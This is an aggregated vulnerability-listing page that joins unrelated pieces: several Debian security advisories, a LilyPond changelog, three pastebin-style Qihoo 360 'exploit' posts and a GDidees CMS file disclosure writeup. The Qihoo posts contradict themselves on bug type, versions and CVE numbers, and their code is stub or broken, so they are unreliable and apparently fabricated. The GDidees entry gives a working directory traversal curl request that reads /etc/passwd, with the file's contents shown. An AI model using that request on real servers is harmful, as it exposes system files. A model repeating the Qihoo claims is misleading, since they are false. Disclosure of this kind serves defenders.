Buffer Overflow vulnerability in Qihoo 360 Chrome v13.0.2170.0 allows attacker to escalate priveleges.

1.  \# Exploit Title: Qihoo 360 Chrome v12.0.1592.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/ee/
    
6.  \# Version: Qihoo 360 Chrome v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33970
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    

13.  Qihoo 360 Chrome v13.0.2170.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

15.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Chrome v13.0.2170.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

17.  function trigger() {
    
18.  let o = {a: 1};
    
19.  let p = new Proxy(o, {});
    
20.  p.\_\_proto\_\_ = {};
    
21.  p.\_\_proto\_\_.x = 0;
    

23.  let b = new ArrayBuffer(8);
    
24.  let f64 = new Float64Array(b);
    
25.  let u32 = new Uint32Array(b);
    

27.  function ftoi(val) {
    
28.  f64\[0\] = val;
    
29.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
30.  }
    

32.  function itof(val) {
    
33.  u32\[0\] = Number(val & 0xffffffffn);
    
34.  u32\[1\] = Number(val >> 32n);
    
35.  return f64\[0\];
    
36.  }
    

38.  function addrof(obj) {
    
39.  o.a = obj;
    
40.  return ftoi(p.x);
    
41.  }
    

43.  // Exploit code goes here
    
44.  }
    

46.  trigger();
    

48.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
    

50.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    

52.  \---------------------------------------------------------------------------

CVE-2021-33970: CVE-2021-33970 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Safe Browser v13.0.2170.0 allows attacker to escalate priveleges.

1.  \# Exploit Title: Qihoo 360 Safe Browser v12.3.1611.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/se/
    
6.  \# Version: Qihoo 360 Safe Browser v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33972
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Qihoo 360 Safe Browser v12.3.1611.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

14.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Safe Browser v12.3.1611.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

16.  function trigger() {
    
17.  let o = {a: 1};
    
18.  let p = new Proxy(o, {});
    
19.  p.\_\_proto\_\_ = {};
    
20.  p.\_\_proto\_\_.x = 0;
    

22.  let b = new ArrayBuffer(8);
    
23.  let f64 = new Float64Array(b);
    
24.  let u32 = new Uint32Array(b);
    

26.  function ftoi(val) {
    
27.  f64\[0\] = val;
    
28.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
29.  }
    

31.  function itof(val) {
    
32.  u32\[0\] = Number(val & 0xffffffffn);
    
33.  u32\[1\] = Number(val >> 32n);
    
34.  return f64\[0\];
    
35.  }
    

37.  function addrof(obj) {
    
38.  o.a = obj;
    
39.  return ftoi(p.x);
    
40.  }
    

42.  // Exploit code goes here
    
43.  }
    

45.  trigger();
    

47.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
    

49.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    
50.  \---------------------------------------------------------------------------

CVE-2021-33972: CVE-2021-33972 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Total Security v10.8.0.1060 and v10.8.0.1213 allows attacker to escalate privileges.

1.  \# Exploit Title: Qihoo 360 Safe Browser v13.0.2170.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/se/ & https://browser.360.cn/ee/
    
6.  \# Version: Qihoo 360 Safe Browser v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33975
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Qihoo 360 Safe Browser v13.0.2170.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

14.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Safe Browser v13.0.2170.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

16.  function trigger() {
    
17.  let o = {a: 1};
    
18.  let p = new Proxy(o, {});
    
19.  p.\_\_proto\_\_ = {};
    
20.  p.\_\_proto\_\_.x = 0;
    

22.  let b = new ArrayBuffer(8);
    
23.  let f64 = new Float64Array(b);
    
24.  let u32 = new Uint32Array(b);
    

26.  function ftoi(val) {
    
27.  f64\[0\] = val;
    
28.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
29.  }
    

31.  function itof(val) {
    
32.  u32\[0\] = Number(val & 0xffffffffn);
    
33.  u32\[1\] = Number(val >> 32n);
    
34.  return f64\[0\];
    
35.  }
    

37.  function addrof(obj) {
    
38.  o.a = obj;
    
39.  return ftoi(p.x);
    
40.  }
    

42.  // Exploit code goes here
    
43.  }
    

45.  trigger();
    

47.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations , which are essential for exploiting this vulnerability.
    

49.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    
50.  \---------------------------------------------------------------------------

CVE-2021-33975: CVE-2021-33975 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Safe guard v12.1.0.1004, v12.1.0.1005, v13.1.0.1001 allows attacker to escalate priveleges.

1.  \# Exploit Title: 360 Total Security 10.8.0.1213 Local Privilege Escalation
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: http://www.360totalsecurity.com/
    
6.  \# Version: 360 Total Security 10.8.0.1213
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33973
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1213
    

14.  A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1213, which allows the antivirus software to execute actions with system-level privileges while running under standard user privileges, The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
    

16.  Introduction
    
17.  360 Total Security 10.8.0.1213 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
    

19.  Vulnerability
    
20.  The LPE/EOP vulnerability in 360 Total Security 10.8.0.1213 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
    

22.  Proof of Concept
    

24.  #include <Windows.h>
    
25.  #include <stdio.h>
    

27.  int main() {
    
28.  // Load the vulnerable driver
    
29.  HMODULE hDriver = LoadLibrary("360TotalSecurity.sys");
    
30.  if (!hDriver) {
    
31.  printf("Failed to load driver: %d\\n", GetLastError());
    
32.  return 1;
    
33.  }
    

35.  // Get address
    
36.  FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
    
37.  if (!pVulnFunc) {
    
38.  printf("Failed to get function address: %d\\n", GetLastError());
    
39.  FreeLibrary(hDriver);
    
40.  return 1;
    
41.  }
    

43.  // Exploit code
    

45.  pVulnFunc(/\* Crafted argument \*/);
    

48.  FreeLibrary(hDriver);
    
49.  return 0;
    
50.  }
    

52.  the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
    
53.  \---------------------------------------------------------------------------

CVE-2021-33973: CVE-2021-33973 - Pastebin.com

Debian Linux Security Advisory 5390-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5390-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 16, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2033Debian Bug     : 1034406Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 112.0.5615.121-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ8MnEACgkQEMKTtsN8TjaGfhAAiJWqYWW3KO7l2i4JBe+vne7rZdEoCMsC7HxhDBbvSBs3sd0bFCUsGTdKqbPcc1l8dX49jcyxF+Fl7y+P/HvvsZ1fb1te5yvbcvVoe1RR+6GQ45Os33eWSVJZsGZ2AHjlHsej2/srOGPcDPOjHv1AgnCIHtJ2OK5MOPWbvyCfRl0T75Whge3XxQGz/KnnYnwQU1bZGT74j8U1FkVDpxeDN+nBah9IElRBCOg2Jkz840tPcftaZdUtQKH2upOg14At/IhqImiYc4HqbsHBSWFHstraskAFK/smXHEYPa2tdBVcLpqjOR9zHRfPpLPPM4yeu8OsU3Sr3YqzZL+xrA/DitENHcDwgkKzNJOHbFXUVX2/nEtrTSG80l+LjFzr4H1N5t6jgPTQf4AQmSjHKAKeVkYooNL2iFV8vfn0LcHgc7AXwGCADQC7hHzAhZaoX9e3Gkjhh9wo1D77zUGC4WcW3kQQXlA4BecfabBN3L+cFJMQPQKf9mOgt3lb2gJzB8cXe1z4PpnQ3JD1X7dkjy+ukpbfyxrFU3WYOPffXyHJ6hqtcYQSG/ktaIZ1RJmB1fI89g9k8/rDaFs4/0GfEA9ZCbKLhFX3FhNNkwkVoBwcbatZiizpDX3wrW3awgk+KKZHE7etFEavqSjaP96cQ3UvvxMd/8NvlkIpz9EgzLy/E74=gB3H-----END PGP SIGNATURE-----

Debian Security Advisory 5390-1

Debian Linux Security Advisory 5389-1 - Two vulnerabilities were discovered in rails, the Ruby based server-side MVC web application framework, which could lead to XSS and DOM based cross-site scripting (CRS). This update also fixes a regression introduced in previous update that may block certain access for apps using development environment.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5389-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuApril 14, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : railsCVE ID         : CVE-2023-23913 CVE-2023-28120Debian Bug     : 1033262 1033263Brief introduction Two vulnerabilities were discovered in rails, the Ruby based server-sideMVC web application framework, which could lead to XSS and DOM basedcross-site scripting (CRS).This update also fixes a regression introduced in previous update thatmay block certain access for apps using development environment.For the stable distribution (bullseye), these problems have been fixed inversion 2:6.0.3.7+dfsg-2+deb11u2.We recommend that you upgrade your rails packages.For the detailed security status of rails please refer toits security tracker page at:https://security-tracker.debian.org/tracker/railsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmQ5gEQACgkQO1LKKgqv2VT/iwgAvAA/wob57s9L6OseUHQL9E83qcGgmyukO5rPg0v+DSJXNWZP76ntGemfHQPeD73OqjBymt9JBSkI7ZGqDA8VvqR/5TvXF4IUlVyQ7CQ7DEHcJJVDcMH4MVIKzgl6mGk3eeqZf1e2TmV5+NUkLcOEi8JPlcnA8umue6GiGMOVpee6h57omEJjLrbIWuZc5z4+OEX1PVCgEVVbfsgxY8R43Eu6+3RPciYHkuo/spY6sdqFGWojvVEM25qZ49Nae4JcUFmK1VWprzZstrlSCaXVmiBQ/grUtHXyMd5jGSHVh7XFdl98ggKasUiUSS3cOqNJS9WzFK6oLORMXfI4iIklNQ===FKaG-----END PGP SIGNATURE-----

Debian Security Advisory 5389-1

GDidees CMS version 3.9.1 suffers from file disclosure and directory traversal vulnerabilities.

    # Exploit Title: GDidees CMS - 'imgdownload.php' Local File Disclosure# Date : 03/27/2023# Exploit Author : Hadi Mene# Vendor Homepage : https://www.gdidees.eu/# Software Link : https://www.gdidees.eu/cms-1-0.html# Version : 3.9.1 and earlier # Tested on : Debian 11 # CVE : CVE-2023-27179### Summary:GDidees CMS v3.9.1 and lower versions was discovered to contain an local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.### Description :Imgdownload.php is mainly used by the QR code generation module to download an QR code. The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.Furthermore, there is no admin session check in this code as it should since only the admin user should normallybe able to download QR code.Vulnerable Code :3. if (isset($_GET["filename"])) {4.        $filename=$_GET["filename"];    .....          .....27. @readfile($filename) OR die();### POC :URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwdExploitation using curl # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinntp:x:104:110::/nonexistent:/usr/sbin/nologinmessagebus:x:105:111::/nonexistent:/usr/sbin/nologinuuidd:x:106:112::/run/uuidd:/usr/sbin/nologinpulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologinlightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/falsehadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinvboxadd:x:998:1::/var/run/vboxadd:/bin/falseopenldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/falsesshd:x:110:65534::/run/sshd:/usr/sbin/nologinmysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false### References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179https://nvd.nist.gov/vuln/detail/CVE-2023-27179https://www.exploit-db.com/papers/12883

GDidees CMS 3.9.1 Local File Disclosure / Directory Traversal

LilyPond before 2.24 allows attackers to bypass the -dsafe protection mechanism via output-def-lookup or output-def-scope, as demonstrated by dangerous Scheme code in a .ly file that causes arbitrary code execution during conversion to a different file format. NOTE: in 2.24 and later versions, safe mode is removed, and the product no longer tries to block code execution when external files are used.

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 21 Aug 2021 06:22:22 -0600
Source: lilypond
Architecture: source
Version: 2.22.1-1
Distribution: unstable
Urgency: medium
Maintainer: Anthony Fok <foka@debian.org>
Changed-By: Anthony Fok <foka@debian.org>
Changes:
 lilypond (2.22.1-1) unstable; urgency=medium
 .
   \* New upstream version 2.22.1
   \* Bump Standards-Version to 4.6.0 (no change)
   \* Mark lilypond-{doc-pdf,fonts} "Multi-Arch: foreign"
   \* Drop previously backported upstream patches
   \* Mark Lilypond as insecure for externally fetched data files
     in the new README.Debian.security file kindly provided by
     fellow Debian Developer and security expert Moritz Mühlenhoff
Checksums-Sha1:
 7f5f22c1bd9b04f7a3e14ba92f1ffb7fdde0a575 4500 lilypond\_2.22.1-1.dsc
 13b37383e69d96123630fc7519af4cd8b0feadb0 2510038 lilypond\_2.22.1.orig-guile18.tar.gz
 a79c28f1f9956c756df357ef4ab7051131881cf2 18033161 lilypond\_2.22.1.orig.tar.gz
 6702433bc81923f4100613905bc07a85d8f17d88 80540 lilypond\_2.22.1-1.debian.tar.xz
 7a14c6250e647a2b5267b50e7682515d4ff234ee 22633 lilypond\_2.22.1-1\_amd64.buildinfo
Checksums-Sha256:
 4a1be7cbda2b1190456f0eb1eff3f17d536a4eb6e855dc02031a8627ed8fa4f8 4500 lilypond\_2.22.1-1.dsc
 55ff45dd426c58ef7a5530b4e701c2a6a1e54043c2b69c64206fc105ddd247db 2510038 lilypond\_2.22.1.orig-guile18.tar.gz
 72ac2d54c310c3141c0b782d4e0bef9002d5519cf46632759b1f03ef6969cc30 18033161 lilypond\_2.22.1.orig.tar.gz
 681159939704995506ad31d0898536364faa767c815558809d7e37e94cabf003 80540 lilypond\_2.22.1-1.debian.tar.xz
 b9d7b226188769c0c5acaed1358e58c80eb3a9e52f539d99077f07ee08b72bd7 22633 lilypond\_2.22.1-1\_amd64.buildinfo
Files:
 6e1c5a49d2f78da2a212a3e9b6aa4770 4500 tex optional lilypond\_2.22.1-1.dsc
 2863f46023dd38e33ac37978302c078f 2510038 tex optional lilypond\_2.22.1.orig-guile18.tar.gz
 07321f2d9dc45d2f14d5057609184aae 18033161 tex optional lilypond\_2.22.1.orig.tar.gz
 c4bf1e7f7d7678babd654e5ab7ce38fe 80540 tex optional lilypond\_2.22.1-1.debian.tar.xz
 4816ce4ba492da1a0b5fccead28a793f 22633 tex optional lilypond\_2.22.1-1\_amd64.buildinfo

-----BEGIN PGP SIGNATURE-----

iQJEBAEBCAAuFiEEFCQhsZrUqVmW+VBy6iUAtBLFms8FAmEhOnIQHGZva2FAZGVi
aWFuLm9yZwAKCRDqJQC0EsWaz6b4EACs5L0e594aTv0H0g+tlnVdxJf0H6UUN58L
08zQK4w/ySdvFsPxi7yulTosxVASZNhMM6KwDN24j/gqF+627g1QFLVTE852Zs8W
G9dxKXaAU+yppj5+vTFmJbT/+zFM3+LpCf5gsKj3q6uOK+8WBeX4hEKfIlnr5oJc
VmmPNOnbmSFzJ+N5RgcqSyydeZVfl5fG3z9r42MTWjDp6XkILmXSJM5gp9Dw0Ri1
3oWHFH5CWjJRLKk2o2HMBN2C08wSsJ1fEBYPXbjEurMAcZTaF2Zrqo7A/wO8Op2+
6od4R/2yaZkiwsDABH1jXSCD1pPLO2ts003TKlXMNReSD7NfqtMsj47XddERgznf
2Nzohvcgdcjhah9WeneGEbqn72oZxkvyWT7OIjBpwxMxXKSJWLgFWXwNredyKtNS
gpaUqW69W49awRSraKY3vXvSSaBgXam4+/xwTp+VevmRJEtNJffBsTJdJVx0nF+Q
j+suEpPzAmdG7v6KqdEkoNMRnCNQQCnZ/e4Ar82iDbiCztMfOaohl8CGQVXC3Pxb
kxLfYKwv0HtHoBrQA5hHVB0y03YhzMzepTDi9vSs+i9uaBTE7SlD/Sw/BPt+CTpU
iwqEEcZ79n/3pcefRZaBHx9XAnx/Mfg5+4FxyDZ0cxRtWvY3znLlHU7KfcCkkY0r
2emmKId2LA==
=h3FA
-----END PGP SIGNATURE-----

CVE-2020-17354: Debian Package Tracker

Debian Linux Security Advisory 5388-1 - It was reported that HAProxy, a fast and reliable load balancing reverse proxy, does not properly initialize connection buffers when encoding the FCGI_BEGIN_REQUEST record. A remote attacker can take advantage of this flaw to cause an information leak.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5388-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 13, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : haproxyCVE ID         : CVE-2023-0836It was reported that HAProxy, a fast and reliable load balancing reverseproxy, does not properly initialize connection buffers when encoding theFCGI_BEGIN_REQUEST record. A remote attacker can take advantage of thisflaw to cause an information leak.For the stable distribution (bullseye), this problem has been fixed inversion 2.2.9-2+deb11u5.We recommend that you upgrade your haproxy packages.For the detailed security status of haproxy please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/haproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQ4YxlfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RA+g/8C9B17OgAEYmOivNLX/0SmHC0WQft66LH5a3lrr+xgncSO6h7REzVlgMXIffI+RnTxTuHH0sMb8S1rYsAfaHeAHGzXOEKiooPVwMix3TMTR6mocv5D1V4smTiI8JWZSDIzPLKn1EYKQDXxg8wz6nEVsc5njF8SAcWZ1fDDLgbbVtUEY9SL2dkGLF+QlsGWnsseN6AzNfVm7vYIdTzSFbc1Hd3mnlL+uIolhKkGLtQ+iMTLxWjxu1n4MqIYh3VR/f2BUVez9JP3GZ/BOEZU/M3b91QYjmY2OghAlNBBXlL/jMmbZAAAfFukIK1JIb23iLac/bjv6e8yixwLX0q+t0j4ZTpxmln+iiIPLSZ/1IBYXOvf6nrP/cIueGqwlMFdD6qRm7s8cIsx4Gw8bb+ge9zUCOdkX0uPzLDRWul3e+69fdmWazcmDXIFOrgBcp5cp4i33r0+T338rimyN4Q6CyqYQ756gf5mK8kq/vVLI4qyLYmVjZj2eAUI6EPWptxP0UKUarFtpYsc2XRRFb66bxaRTf1yuPvR3aRJKnBW4+KnuiTho1J5wa/HaK551NWwbgmICsbGsfI5/S0cHpYcvdSRG5SAZavFGUT/dIlsOD4OdjevHGnN021AYP1+EqLuX8Zsq5DQKh3s/yUsl6svTTBOiXZxVer9DLYD+D4yuqkqIc=6SUU-----END PGP SIGNATURE-----

Debian Security Advisory 5388-1

Debian Linux Security Advisory 5387-1 - David Marchard discovered that Open vSwitch, a software-based Ethernet virtual switch, is susceptible to denial of service via malformed IP packets.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5387-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 13, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openvswitchCVE ID         : CVE-2023-1668Debian Bug     : 1034042David Marchard discovered that Open vSwitch, a software-based Ethernetvirtual switch, is suspectible to denial of service via malformed IPpackets.For the stable distribution (bullseye), this problem has been fixed inversion 2.15.0+ds1-2+deb11u4.We recommend that you upgrade your openvswitch packages.For the detailed security status of openvswitch please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openvswitchFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ4TY8ACgkQEMKTtsN8TjZbyRAAsrzNlczYAYlZQtb4iT8qZxHT0VVUwcxoWL7ejlNblGU2WrSFoEdmnqvpE6wy30DL0OhsRd/hmGuwIKfgkuAwQRZzu7+DHIsRfCQvqiQLtS6EUkVz2v/mEARIROSlGvCKg24hGrnN/BecyWem9hR1iK/o5heWm7CmTFF9Lv9cFUWEBwXNR9a8DtP/lM9neqX+VDpB33+N0u1jT4BmR0JyG47GyTzNNPoVrYsaRhpyLOIScXFXiuC5Z4J/pepOKDcIEDTgqfD1l7Z2Yr+L2CUiO0lx6KjSoBw5x4YJYmiLwdA7LdtBKVh0X/zsqBMPpP07Z/wtx6CXmH49KEfuIB4Peai/YBgUeVgq/p5Id7Ztmok+BtURlE0mCQVqh/iUc3G71tFZW7Epa7BxCqb/r0ORElTmZpkyi469qvcJDu0RVXp6UzFnYJYJ1IBYifiErzixy1i8j/7vcBzhOIWr3jcSVhjHLWx4U1a/3wIkDjKoUfgKtAlQddy60hO3YJFtevgqofFDaetCK/HlSqoPjOJ0Jcb8AowTuWtWCUE/Dd3ohfWNrjx6kk10ynsVgzbyMqlLx0P6gyEwGlWdmHmLDZ2F8vEjQ7Bmqc8vFs87RyWdfBTFHKvGXjN2dldzK5g7oSh2M+Ln1LrGTRsSMBJS7eFTqVAl1HLxpXEiNBzliJKBx0g=Gmnz-----END PGP SIGNATURE-----

Tag

#debian